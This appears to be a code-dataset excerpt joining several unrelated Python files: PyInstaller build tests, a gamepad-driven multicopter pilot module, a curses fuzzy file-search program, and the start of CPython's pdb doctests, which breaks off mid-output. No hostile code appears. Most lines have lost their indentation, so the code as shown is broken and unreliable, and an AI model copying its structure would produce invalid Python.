# NOTE: '-s' option to pytest disables output capturing, changing this test's result:
# without -s: py.test process changes its own stdout encoding to 'UTF-8' to capture output. subprocess spawned by
# py.test has stdout encoding 'cp1252', which is an ANSI codepage. test fails as they do not match.
# with -s: py.test process has stdout encoding from windows terminal, which is an OEM codepage. spawned
# subprocess has the same encoding. test passes.
with open(os.path.join(tmpdir.strpath, 'stderr_encoding.build'), 'w') as f:
if sys.stderr.isatty():
enc = str(sys.stderr.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stderr_encoding.py')
def test_stdout_encoding(tmpdir, pyi_builder):
with open(os.path.join(tmpdir.strpath, 'stdout_encoding.build'), 'w') as f:
if sys.stdout.isatty():
enc = str(sys.stdout.encoding)
else:
            # For non-interactive stdout use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stdout_encoding.py')
def test_site_module_disabled(pyi_builder):
pyi_builder.test_script('pyi_site_module_disabled.py')
def test_time_module(pyi_builder):
pyi_builder.test_source("""
import time
print(time.strptime(time.ctime()))
""")
@pytest.mark.darwin
@pytest.mark.linux
def test_time_module_localized(pyi_builder, monkeypatch):
# This checks that functions 'time.ctime()' and 'time.strptime()' use the same locale. There was an issue with
# bootloader where every function was using different locale:
# time.ctime was using 'C'
# time.strptime was using 'xx_YY' from the environment.
monkeypatch.setenv('LC_ALL', 'cs_CZ.UTF-8')
pyi_builder.test_source("""
import time
print(time.strptime(time.ctime()))
""")
def test_xmldom_module(pyi_builder):
pyi_builder.test_source(
"""
print('Importing xml.dom')
from xml.dom import pulldom
print('Importing done')
"""
)
def test_threading_module(pyi_builder):
pyi_builder.test_source(
"""
import threading
import sys
print('See stderr for messages')
def print_(*args): print(*args, file=sys.stderr)
def doit(nm):
print_(nm, 'started')
import pyi_testmod_threading
try:
print_(nm, pyi_testmod_threading.x)
finally:
print_(nm, pyi_testmod_threading)
t1 = threading.Thread(target=doit, args=('t1',))
t2 = threading.Thread(target=doit, args=('t2',))
t1.start()
t2.start()
doit('main')
t1.join() ; print_('t1 joined')
t2.join() ; print_('t2 joined')
print_('finished.')
"""
)
def test_threading_module2(pyi_builder):
pyi_builder.test_script('pyi_threading_module2.py')
def test_argument(pyi_builder):
pyi_builder.test_source(
"""
import sys
assert sys.argv[1] == "--argument", "sys.argv[1] was %r, expected %r" % (sys.argv[1], "--argument")
""",
app_args=["--argument"]
)
@importorskip('win32com')
def test_pywin32_win32com(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
        # All modules from pywin32 depend on the pywintypes module,
        # which should also be included.
import win32com
import win32com.client
import win32com.server
"""
)
#@pytest.mark.xfail(reason="Requires post-create-package hooks (issue #1322)")
@importorskip('win32com')
def test_pywin32_comext(pyi_builder):
pyi_builder.test_source(
"""
# Test importing modules from win32com that are actually present in
# win32comext, and made available by __path__ changes in win32com.
from win32com.shell import shell
from win32com.propsys import propsys
from win32com.bits import bits
"""
)
@importorskip('win32ui')
@xfail(reason="https://github.com/mhammond/pywin32/issues/1614")
def test_pywin32_win32ui(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
        # All modules from pywin32 depend on the pywintypes module,
        # which should also be included.
import win32ui
from pywin.mfc.dialog import Dialog
d = Dialog(win32ui.IDD_SIMPLE_INPUT)
"""
)
@pytest.mark.win32
def test_renamed_exe(pyi_builder):
_old_find_executables = pyi_builder._find_executables
def _find_executables(name):
oldexes = _old_find_executables(name)
newexes = []
for old in oldexes:
new = os.path.join(os.path.dirname(old), "renamed_" + os.path.basename(old))
os.rename(old, new)
newexes.append(new)
return newexes
pyi_builder._find_executables = _find_executables
pyi_builder.test_source("print('Hello Python!')")
def test_spec_with_utf8(pyi_builder_spec):
pyi_builder_spec.test_spec('spec-with-utf8.spec')
@pytest.mark.darwin
def test_osx_override_info_plist(pyi_builder_spec):
pyi_builder_spec.test_spec('pyi_osx_override_info_plist.spec')
def test_hook_collect_submodules(pyi_builder, script_dir):
# This is designed to test the operation of PyInstaller.utils.hook.collect_submodules. To do so:
#
# 1. It imports the dummy module pyi_collect_submodules_mod, which contains nothing.
# 2. This causes hook-pyi_collect_submodules_mod.py to be run, which collects some dummy submodules. In this case,
# it collects from modules/pyi_testmod_relimp.
# 3. Therefore, we should be able to find hidden imports under pyi_testmod_relimp.
pyi_builder.test_source(
"""
import pyi_collect_submodules_mod
__import__('pyi_testmod_relimp.B.C')
""", ['--additional-hooks-dir=%s' % script_dir.join('pyi_hooks')]
)
# Test that PyInstaller can handle a script with an arbitrary extension.
def test_arbitrary_ext(pyi_builder):
pyi_builder.test_script('pyi_arbitrary_ext.foo')
def test_option_runtime_tmpdir(pyi_builder):
"""
Test to ensure that option `runtime_tmpdir` can be set and has effect.
"""
pyi_builder.test_source(
"""
print('test - runtime_tmpdir - custom runtime temporary directory')
import os
import sys
cwd = os.path.abspath(os.getcwd())
runtime_tmpdir = os.path.abspath(sys._MEIPASS)
# for onedir mode, runtime_tmpdir == cwd
# for onefile mode, os.path.dirname(runtime_tmpdir) == cwd
if not runtime_tmpdir == cwd and not os.path.dirname(runtime_tmpdir) == cwd:
raise SystemExit('Expected sys._MEIPASS to be under current working dir.'
' sys._MEIPASS = ' + runtime_tmpdir + ', cwd = ' + cwd)
print('test - done')
""", ['--runtime-tmpdir=.']
) # set runtime-tmpdir to current working dir
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts1(pyi_builder_spec):
"""
    Verify each script has its own global vars (original case, see issue #2949).
"""
pyi_builder_spec.test_spec('several-scripts1.spec')
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts2(pyi_builder_spec):
"""
    Verify each script has its own global vars (basic test).
"""
pyi_builder_spec.test_spec('several-scripts2.spec')
@pytest.mark.win32
def test_pe_checksum(pyi_builder):
import ctypes
from ctypes import wintypes
pyi_builder.test_source("print('hello')")
exes = pyi_builder._find_executables('test_source')
assert exes
for exe in exes:
# Validate the PE checksum using the official Windows API for doing so.
# https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-mapfileandchecksumw
header_sum = wintypes.DWORD()
checksum = wintypes.DWORD()
assert ctypes.windll.imagehlp.MapFileAndCheckSumW(
ctypes.c_wchar_p(exe), ctypes.byref(header_sum), ctypes.byref(checksum)
) == 0
assert header_sum.value == checksum.value
def test_onefile_longpath(pyi_builder, tmpdir):
"""
Verify that files with paths longer than 260 characters are correctly extracted from the onefile build.
    See issue #5615.
"""
# The test is relevant only for onefile builds
if pyi_builder._mode != 'onefile':
pytest.skip('The test is relevant only to onefile builds.')
# Create data file with secret
_SECRET = 'LongDataPath'
src_filename = tmpdir / 'data.txt'
with open(src_filename, 'w') as fp:
fp.write(_SECRET)
# Generate long target filename/path; eight equivalents of SHA256 strings plus data.txt should push just the
# _MEIPASS-relative path beyond 260 characters...
dst_filename = os.path.join(*[32 * chr(c) for c in range(ord('A'), ord('A') + 8)], 'data.txt')
assert len(dst_filename) >= 260
# Name for --add-data
if is_win:
add_data_name = src_filename + ';' + os.path.dirname(dst_filename)
else:
add_data_name = src_filename + ':' + os.path.dirname(dst_filename)
pyi_builder.test_source(
"""
import sys
import os
data_file = os.path.join(sys._MEIPASS, r'{data_file}')
print("Reading secret from %r" % (data_file))
with open(data_file, 'r') as fp:
secret = fp.read()
assert secret == r'{secret}'
""".format(data_file=dst_filename, secret=_SECRET), ['--add-data', str(add_data_name)]
)
@pytest.mark.win32
@pytest.mark.parametrize("icon", ["icon_default", "icon_none", "icon_given"])
def test_onefile_has_manifest(pyi_builder, icon):
"""
    Verify that onefile builds on Windows end up having a manifest embedded. See issue #5624.
"""
from PyInstaller.utils.win32 import winmanifest
from PyInstaller import PACKAGEPATH
# The test is relevant only for onefile builds
if pyi_builder._mode != 'onefile':
pytest.skip('The test is relevant only to onefile builds.')
# Icon type
if icon == 'icon_default':
# Default; no --icon argument
extra_args = []
elif icon == 'icon_none':
# Disable icon completely; --icon NONE
extra_args = ['--icon', 'NONE']
elif icon == 'icon_given':
# Locate pyinstaller's default icon, and explicitly give it
# via --icon argument
icon_path = os.path.join(PACKAGEPATH, 'bootloader', 'images', 'icon-console.ico')
extra_args = ['--icon', icon_path]
# Build the executable...
pyi_builder.test_source("""print('Hello world!')""", extra_args)
# ... and ensure that it contains manifest
exes = pyi_builder._find_executables('test_source')
assert exes
for exe in exes:
res = winmanifest.GetManifestResources(exe)
assert res, "No manifest resources found!"
@pytest.mark.parametrize("append_pkg", [True, False], ids=["embedded", "sideload"])
def test_sys_executable(pyi_builder, append_pkg, monkeypatch):
"""
Verify that sys.executable points to the executable, regardless of build mode (onedir vs. onefile) and the
append_pkg setting (embedded vs. side-loaded CArchive PKG).
"""
# Set append_pkg; taken from test_pyz_as_external_file
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = append_pkg
return EXE(*args, **kwargs)
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
# Expected executable basename
exe_basename = 'test_source'
if is_win:
exe_basename += '.exe'
pyi_builder.test_source(
"""
import sys
import os
exe_basename = os.path.basename(sys.executable)
assert exe_basename == '{}', "Unexpected basename(sys.executable): " + exe_basename
""".format(exe_basename)
)
@pytest.mark.win32
def test_subprocess_in_windowed_mode(pyi_windowed_builder):
"""Test invoking subprocesses from a PyInstaller app built in windowed mode."""
pyi_windowed_builder.test_source(
r"""
from subprocess import PIPE, run
from unittest import TestCase
# Lazily use unittest's rich assertEqual() for assertions with builtin diagnostics.
assert_equal = TestCase().assertEqual
run([{0}, "-c", ""], check=True)
# Verify that stdin, stdout and stderr still work and haven't been muddled.
p = run([{0}, "-c", "print('foo')"], stdout=PIPE, universal_newlines=True)
assert_equal(p.stdout, "foo\n", p.stdout)
p = run([{0}, "-c", r"import sys; sys.stderr.write('bar\n')"], stderr=PIPE, universal_newlines=True)
assert_equal(p.stderr, "bar\n", p.stderr)
p = run([{0}], input="print('foo')\nprint('bar')\n", stdout=PIPE, universal_newlines=True)
assert_equal(p.stdout, "foo\nbar\n", p.stdout)
""".format(repr(sys.executable)),
pyi_args=["--windowed"]
)
|
pilot.py
|
"""
To install X-Box gamepad software on Ubuntu 14.04:
sudo apt-get install dkms
sudo git clone https://github.com/paroj/xpad.git /usr/src/xpad-0.4
sudo dkms install -m xpad -v 0.4
sudo modprobe xpad (might need to turn off "secure boot" in BIOS)
reboot computer and then plug in an Xbox 360/One gamepad via USB
press the big X button, light should glow solid (not flashing)
"""
from __future__ import division
import numpy as np; npl = np.linalg
from threading import Thread
from collections import deque # thread safe
from inputs import devices, get_gamepad
from motion import Command
class Pilot(object):
"""
User interface for remote-controlling a multicopter.
Call start_pilot_thread to begin filling an internal buffer with user input.
Call get_command to execute / clear the buffer and get the current relevant Command object.
Change the mission_code attribute to an integer that will be sent as command.start on activation.
Call stop_pilot_thread when done!
max_roll: magnitude of the largest acceptable roll command (in degrees)
max_pitch: magnitude of the largest acceptable pitch command (in degrees)
max_yaw_rate: magnitude of the largest acceptable yaw rate command (in degrees per time)
max_ascent_rate: magnitude of the largest acceptable ascent rate command
stick_deadband: fraction of analog joystick travel that should be treated as zero
trigger_deadband: fraction of analog trigger travel that should be treated as zero
max_buffer_size: maximum number of user commands that should be stored before dropping old ones
button_callbacks: dictionary of callback functions keyed by button names (A, B, X, Y, L, R, SL, SR, DV, DH, K)
"""
def __init__(self, max_roll=65, max_pitch=65, max_yaw_rate=180, max_ascent_rate=5,
stick_deadband=0.1, trigger_deadband=0.0, max_buffer_size=200, button_callbacks={}):
self.max_roll = np.deg2rad(max_roll)
self.max_pitch = np.deg2rad(max_pitch)
self.max_yaw_rate = np.deg2rad(max_yaw_rate)
self.max_ascent_rate = np.float64(max_ascent_rate)
self.stick_deadband = float(stick_deadband)
self.trigger_deadband = float(trigger_deadband)
self.max_buffer_size = int(max_buffer_size)
self.button_callbacks = button_callbacks
# Valid input device names in priority order
self.valid_device_names = ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller"]
# Set valid input device
self.input_device = None
for valid_device_name in self.valid_device_names:
if self.input_device is not None: break
for device in devices:
if device.name == valid_device_name:
self.input_device = device.name
print "Hello, Pilot! Ready to read from {}.".format(device.name)
break
if self.input_device is None: raise IOError("FATAL: No valid input device is connected!")
# Digital button code names
self.button_codes = {"BTN_SOUTH": "A", "BTN_EAST": "B", "BTN_NORTH": "X", "BTN_WEST": "Y",
"BTN_TL": "L", "BTN_TR": "R", "BTN_SELECT": "SL", "BTN_START": "SR",
"ABS_HAT0Y": "DV", "ABS_HAT0X": "DH", "BTN_MODE": "K"}
# Analog input characteristics
self.max_stick = 32767
self.max_trigger = 1023
self.min_stick = int(self.stick_deadband * self.max_stick)
self.min_trigger = int(self.trigger_deadband * self.max_trigger)
# Internals
self.command = None
self.pilot_thread = None
self.stay_alive = False
self.buffer = deque([])
self.buffer_size_flag = False
# Change this integer attribute to affect what command.start will be when activated
self.mission_code = 0
def get_command(self):
"""
Executes / clears the input buffer and returns the current relevant Command object.
"""
if self.pilot_thread is None: raise AssertionError("FATAL: Cannot get_command without active pilot thread!")
while self.buffer:
event = self.buffer.pop()
if event.code == "ABS_Y": self.command.ascent_rate = -self._stick_frac(event.state) * self.max_ascent_rate
elif event.code == "ABS_X": pass
elif event.code == "ABS_RY": self.command.pitch = -self._stick_frac(event.state) * self.max_pitch
elif event.code == "ABS_RX": self.command.roll = self._stick_frac(event.state) * self.max_roll
elif event.code == "ABS_Z": self.command.yaw_rate = self._trigger_frac(event.state) * self.max_yaw_rate
elif event.code == "ABS_RZ": self.command.yaw_rate = -self._trigger_frac(event.state) * self.max_yaw_rate
elif event.code in self.button_codes:
if event.code == "BTN_WEST": self.command.start = int(event.state * self.mission_code)
elif event.code == "BTN_NORTH": self.command.cancel = bool(event.state)
elif event.code == "BTN_MODE": self.command.kill = bool(event.state)
self.button_callbacks.get(self.button_codes[event.code], lambda val: None)(event.state)
return self.command
def start_pilot_thread(self):
"""
Starts a thread that reads user input into the internal buffer.
"""
if self.stay_alive:
print "----------"
print "WARNING: Pilot thread already running!"
print "Cannot start another."
print "----------"
return
self.command = Command()
self.stay_alive = True
if self.input_device in ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller"]:
self.pilot_thread = Thread(target=self._listen_xbox)
else:
raise IOError("FATAL: No listener function has been implemented for device {}.".format(self.input_device))
print "Pilot thread has begun!"
self.pilot_thread.start()
def stop_pilot_thread(self):
"""
Terminates the Pilot's user input reading thread and clears the buffer.
"""
self.stay_alive = False
if self.pilot_thread is not None:
print "Pilot thread terminating on next input!"
self.pilot_thread.join() # stay secure
self.pilot_thread = None
while self.buffer:
self.buffer.pop()
self.buffer_size_flag = False
self.command = None
def _listen_xbox(self):
try:
while self.stay_alive:
self.buffer.appendleft(get_gamepad()[0]) # this is blocking (hence need for threading)
if len(self.buffer) > self.max_buffer_size:
if not self.buffer_size_flag:
self.buffer_size_flag = True
print "----------"
print "WARNING: Pilot input buffer reached {} entries.".format(self.max_buffer_size)
print "Dropping old commands."
print "----------"
self.buffer.pop()
finally:
print "Pilot thread terminated!"
self.pilot_thread = None
def _stick_frac(self, val):
if abs(val) > self.min_stick:
return np.divide(val, self.max_stick, dtype=np.float64)
return np.float64(0)
def _trigger_frac(self, val):
if abs(val) > self.min_trigger:
return np.divide(val, self.max_trigger, dtype=np.float64)
return np.float64(0)
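# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the original module).
# It assumes an Xbox gamepad is connected and visible to the `inputs` package,
# and that printing the motion.Command object is enough for a demo; the
# polling rate and duration below are arbitrary choices.
if __name__ == "__main__":
    import time
    pilot = Pilot(max_roll=30, max_pitch=30)
    pilot.start_pilot_thread()
    try:
        for _ in range(50):  # poll the input buffer for roughly 5 seconds
            command = pilot.get_command()  # drains the buffer into a Command
            print command
            time.sleep(0.1)
    finally:
        pilot.stop_pilot_thread()  # joins the listener thread on its next input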
|
main.py
|
import curses
from curses import wrapper
import sys
from timeit import default_timer
import multiprocessing
from trie import main as trie
import fuzzy
from LRUcache import LRUCache
"""
NOTE: All coordinates are in the format (y, x) because that's how curses works.
"""
manager = multiprocessing.Manager()
mutex = manager.Lock()
INVALIDS = [
10,
263,
262,
360,
331,
339,
330,
338,
258,
259,
260,
261,
410,
343,
575,
580,
579,
577
]
INVALIDS += range(265, 275)
def validate_key(c: int):
decoded = curses.keyname(c).decode('utf-8')
    if c in INVALIDS or (decoded.startswith('^') and not decoded.startswith('^[')):
return False
else:
return True
cache = LRUCache(40)
def index_letters(q):
with open('log.txt', 'a') as log:
log.write("index thread\n")
try:
path = sys.argv[1]
except IndexError:
path = None
file_list = trie(path)
to_put = []
for i in range(ord('a'), ord('z')+1):
full_string = chr(i)
matches = []
for file in file_list:
file_name = file.split('/')[-1]
if ('.' in file_name):
out = fuzzy.fuzzy_match(full_string, file_name)
if out[0]:
full_path = "/".join(file.split('/')[-3:-1])
if len(full_path) > 45:
full_path = "..." + full_path[-42:]
matches.append((out[1], file_name, full_path))
matches.sort(key=lambda x: x[0], reverse=True)
mutex.acquire()
to_put.append((full_string, matches))
mutex.release()
q.put(to_put)
def main(s):
'''
* s is the whole screen as an object
* Main function wrapped by wrapper so that terminal doesn't get messed up
* by accident
'''
with open('log.txt', 'a') as log:
log.write("Curses thread\n")
# Accept path as command line argument
try:
path = sys.argv[1]
except IndexError:
path = None
# Define colors
curses.init_pair(2, curses.COLOR_CYAN, curses.COLOR_BLACK)
# curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
# curses.init_pair(4, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
# Make the trie
# trie.main returns list of all possible paths
file_list = trie(path)
sh, sw = s.getmaxyx() # Get the height, and width of the terminal
s.clear() # Clear the terminal
curses.raw() # Get raw input from the keyboard
curses.echo() # Echo the input keys to the screen
curses.nl() # Set enter to correspond to new line
# Create a title box with height 2 rows and width 100%, starting at 1, 0
title_box = s.subwin(2, sw-7, 1, 3)
title_box.addstr('Directory searching using Trie, fuzzysearch and DFS', curses.color_pair(2))
# title_box.chgat(-1, curses.A_REVERSE) # That sweet background on the title
title_box.chgat(-1, curses.color_pair(5)) # That sweet background on the title
title_box.hline(1, 0, '-', sw-7)
# Create a search box of height 2 rows, width 100 at 3, 0
search_box = s.subwin(2, sw, 3, 0)
search_box.addstr(' Search: ', curses.color_pair(4))
search_box.hline(1, 3, '-', sw-7)
# The output box that covers the rest of the screen
output_box = s.subwin(sh-5, sw-3, 5, 3)
output_box.addstr('Results:\nTo find, you must seek!')
# Instructions at the bottom of the screen
s.addstr(sh-1, 3, 'Start typing to search! Press <ESC> to exit.', curses.color_pair(3))
input_x = 11 # The x coordinate of the cursor
full_string = "" # full_string is the search query
# Store the output here, edit line 86 to format things appropriately
new_file_list = file_list
BACKSPACES = [127, 263]
# Main loop
while 1:
# Get a character from the keyboard
c = s.getch(3, input_x)
if (c == 27):
# Quit if <ESC> is pressed
curses.endwin()
return
elif c in BACKSPACES:
# Check if backspace
new_file_list = file_list
s.addch(3, input_x, " ")
s.addch(3, input_x+1, " ")
s.addch(3, input_x+2, " ")
if (not input_x == 11):
# Check if not empty string
input_x -= 1 # Decrement cursors x-coordinate
full_string = full_string[:-1] # Remove last char of search query
s.delch(3, input_x) # Remove the character from the screen
output_box.clear() # Clear the output box
else:
continue
elif not validate_key(c):
continue
elif not chr(c) == "\n":
# Add the chr to the search query and increment cursor position
full_string += chr(c)
input_x += 1
matches = []
time_taken = ""
# Perform the fuzzy search on each file in the current candidate list (reducing the number of files searched on each query)
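# (The narrowing-and-caching pattern used here is shown in isolation in the
# narrowing_search_demo sketch after this function.)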
start_time = default_timer()
matches = cache.get(full_string)
if matches is None:
matches = []
for file in new_file_list:
file_name = file.split('/')[-1]
if ('.' in file_name):
out = fuzzy.fuzzy_match(full_string, file_name)
if out[0]:
full_path = "/".join(file.split('/')[-3:-1])
if len(full_path) > 45:
full_path = "..." + full_path[-42:]
matches.append((out[1], file_name, full_path))
matches.sort(key=lambda x: x[0], reverse=True)
mutex.acquire()
cache.put(full_string, matches)
mutex.release()
end_time = default_timer()
if matches:
new_file_list = []
for match in matches:
full_file_path = match[2]+'/'+match[1]
new_file_list.append(full_file_path)
time_taken = f"{len(matches)} matches in {(end_time - start_time) * 1000} ms"
if (not (full_string == "" or matches == [])):
# Clear the output box and add the matches
output_box.clear()
if len(matches) > sh - 10:
temp_matches = matches[:sh-11]
else:
temp_matches = matches
for match in temp_matches:
output_box.addstr(f'{match[0]:>4} | ')
output_box.addstr(f'.../{match[2]:<45}', curses.color_pair(2))
output_box.addstr(f' | {match[1]}\n')
elif (full_string == ""):
# Message if there is no input
output_box.clear()
output_box.addstr('To find, you must seek!')
else:
# Message if there are no matches
output_box.clear()
output_box.addstr('What you seek for lies beyond the realms of possibility!')
# refresh all boxes
search_box.refresh()
output_box.refresh()
s.refresh()
# since everything cleared, the message at bottom needs to be written
s.addstr(sh-2, 3, time_taken, curses.color_pair(2))
s.addstr(sh-1, 3, 'Start typing to search! Press <ESC> to exit.', curses.color_pair(3))
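# ---------------------------------------------------------------------------
# Illustrative sketch (not called by the program above): the search loop keeps
# narrowing the candidate list -- once a query matches a subset of files, the
# next, longer query only searches that subset, and results are cached per
# query string. The helper below shows that pattern in isolation, using a
# simple case-insensitive subsequence test as a stand-in for fuzzy.fuzzy_match
# and a plain dict as a stand-in for LRUCache.
def narrowing_search_demo(queries, all_files):
    def is_subsequence(query, name):
        # True if the characters of `query` appear in `name` in order.
        it = iter(name.lower())
        return all(ch in it for ch in query.lower())

    cache = {}              # query string -> list of matching file names
    candidates = all_files
    for query in queries:
        matches = cache.get(query)
        if matches is None:
            matches = [f for f in candidates if is_subsequence(query, f)]
            cache[query] = matches
        print(f"{query!r}: {len(matches)} of {len(candidates)} candidates matched")
        if matches:
            candidates = matches  # only search the narrowed set on later queries
    return cache
# Example call: narrowing_search_demo(["m", "ma", "mai"], ["main.py", "trie.py", "fuzzy.py"])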
if __name__ == "__main__":
q = multiprocessing.Queue()
indexer = multiprocessing.Process(target=index_letters, args=(q,))
main_loop = multiprocessing.Process(target=wrapper, args=(main,))
indexer.start()
vals = q.get()
for val in vals:
cache.put(val[0], val[1])
main_loop.start()
indexer.join()
main_loop.join()
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
